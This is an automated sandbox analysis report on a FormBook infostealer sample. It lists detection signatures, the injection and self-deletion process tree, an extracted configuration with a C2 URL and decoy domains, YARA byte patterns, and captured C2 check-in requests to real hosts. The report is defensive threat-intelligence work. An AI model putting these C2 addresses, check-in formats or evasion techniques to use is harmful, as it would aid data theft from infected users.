Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2u2u8wnrrW.exe

Overview

General Information

Sample Name:2u2u8wnrrW.exe
Analysis ID:502325
MD5:51dcc89ed1035a6c2fc57ada8dcb4dc2
SHA1:0e59efbffdd8153c61f20a6039110474c50c20e9
SHA256:092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 2u2u8wnrrW.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
    • 2u2u8wnrrW.exe (PID: 7164 cmdline: C:\Users\user\Desktop\2u2u8wnrrW.exe MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 3324 cmdline: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.2u2u8wnrrW.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.2u2u8wnrrW.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.2u2u8wnrrW.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        3.2.2u2u8wnrrW.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.2u2u8wnrrW.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2u2u8wnrrW.exeVirustotal: Detection: 16%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538387E GetEncryptedFileVersionExt,11_2_0538387E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A61C GetEncryptedFileVersionExt,11_2_0537A61C
          Source: 2u2u8wnrrW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2u2u8wnrrW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: chkdsk.pdb source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2u2u8wnrrW.exe, chkdsk.exe
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 4x nop then pop ebx3_2_00406AB9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx11_2_00AB6AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.seal-brother.com
          Source: C:\Windows\explorer.exeDomain query: www.kangrungao.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.govindfinance.com
          Source: C:\Windows\explorer.exeNetwork Connect: 59.106.13.53 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.driventow.com
          Source: C:\Windows\explorer.exeNetwork Connect: 8.212.24.67 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.satellitephonstore.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1Host: www.satellitephonstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1Host: www.driventow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1Host: www.kangrungao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:38 GMTContent-Type: text/htmlContent-Length: 275ETag: "615c5dca-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:50 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
